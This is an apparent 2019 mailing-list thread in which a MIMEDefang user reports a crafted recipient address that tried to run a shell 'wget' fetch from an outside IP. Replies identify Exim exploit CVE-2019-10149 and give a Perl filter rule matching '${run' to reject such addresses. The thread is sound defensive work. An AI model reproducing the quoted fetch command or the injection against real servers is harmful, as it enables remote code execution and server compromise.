Re: [Mimedefang] Carefully Crafted Recipient executes script?

2019-06-25 Thread Dianne Skoll 
On 6/25/19 4:50 PM, Kevin A. McGrail wrote:

> It's an exim exploit CVE-2019-10149.  MIMEDefang won't be affected but
> you are correct what it is trying to do.

> In filter_recipient, add this to reject this exploit attempt:

>   #EXIM EXPLOIT 2019 June
>   if ($recip =~ /root\+\$\{run/i) {
> $explanation = "Invalid user";
> $answer = 'REJECT';
> 
> return ($answer, $explanation);
>   }

Thanks for the info; I was racking my brains figuring out how
MIMEDefang could have been tricked by that.

Unless you have odd email addresses, I'd simply reject and address
that contains "${".  Then you will catch variants such as
postmaster+${ etc.

Regards,

Dianne.
___
NOTE: If there is a disclaimer or other legal boilerplate in the above
message, it is NULL AND VOID.  You may ignore it.

Visit http://www.mimedefang.org and http://www.roaringpenguin.com
MIMEDefang mailing list MIMEDefang@lists.roaringpenguin.com
http://lists.roaringpenguin.com/mailman/listinfo/mimedefang

Re: [Mimedefang] Carefully Crafted Recipient executes script?

2019-06-25 Thread Kevin A. McGrail 
On 6/25/2019 4:25 PM, Stefan Schoeman wrote:
> Hoping someone can assist me with this...
>
> I just came across an email processed by MIMEDefang that seems to have
> had a specially crafted recipient. It seems as if the crafted
> recipient managed to coerce either my mimedefang-filter, or MIMEDefang
> itself to actually execute script. The recipient was recorded as : 

It's an exim exploit CVE-2019-10149.  MIMEDefang won't be affected but
you are correct what it is trying to do.

In filter_recipient, add this to reject this exploit attempt:

  #EXIM EXPLOIT 2019 June
  if ($recip =~ /root\+\$\{run/i) {
    $explanation = "Invalid user";
    $answer = 'REJECT';

    return ($answer, $explanation);
  }

Regards,

KAM

___
NOTE: If there is a disclaimer or other legal boilerplate in the above
message, it is NULL AND VOID.  You may ignore it.

Visit http://www.mimedefang.org and http://www.roaringpenguin.com
MIMEDefang mailing list MIMEDefang@lists.roaringpenguin.com
http://lists.roaringpenguin.com/mailman/listinfo/mimedefang

[Mimedefang] Carefully Crafted Recipient executes script?

2019-06-25 Thread Stefan Schoeman 

Hoping someone can assist me with this...

I just came across an email processed by MIMEDefang that seems to have 
had a specially crafted recipient. It seems as if the crafted recipient 
managed to coerce either my mimedefang-filter, or MIMEDefang itself to 
actually execute script. The recipient was recorded as :




which looks as if it tried to execute /bin/sh -c "wget 
65.181.120.163/stfinracu", with at least some partial success, because 
the .INPUTMSG file  resulted in:


Received: 1
Received: 2
Received: 3
...
...
Received: 31

A Spamassasin scan of this file, then yielded:

1.2 MISSING_HEADERS    Missing To: header
1.8 MISSING_SUBJECT    Missing Subject: header
2.3 EMPTY_MESSAGE  Message appears to have no textual parts and 
no Subject: text

1.0 MISSING_FROM   Missing From: header
0.0 MSGID_FROM_MTA_HEADER  Message-Id was added by a relay
1.4 MISSING_DATE   Missing Date: header

which seems to indicate that this lot happened before SpamAssassin ran 
in filter_end


My logfile indicated the following:

Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: from=, 
size=395, class=0, nrcpts=1, msgid=<201906251921.x5PJLcKV004747@--->, 
proto=SMTP, daemon=MTA, relay=minecraft.good-gaming.com [34.228.4.69]
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG: GeoIP 
lookup of 34.228.4.69 is 'US'
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG 
REPLYTO=, SENDER=, FROM=
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: SpamAssassin 
Result : 7.715
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: Mail Subject : 
x5PJLcKV004747 :  : 2 : 7.715 : 0.85136 :  : 
 
: 34.228.4.69 : 395

Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: filter: discard=1
Jun 25 21:21:41 smtp mimedefang[17340]: x5PJLcKV004747: Discarding 
because filter instructed us to

Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: Milter: data, discard
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: discarded

I would very much like to hear the community's opinion on this and how I 
can protect against this?


Thanks in advance!
Stefan


___
NOTE: If there is a disclaimer or other legal boilerplate in the above
message, it is NULL AND VOID.  You may ignore it.

Visit http://www.mimedefang.org and http://www.roaringpenguin.com
MIMEDefang mailing list MIMEDefang@lists.roaringpenguin.com
http://lists.roaringpenguin.com/mailman/listinfo/mimedefang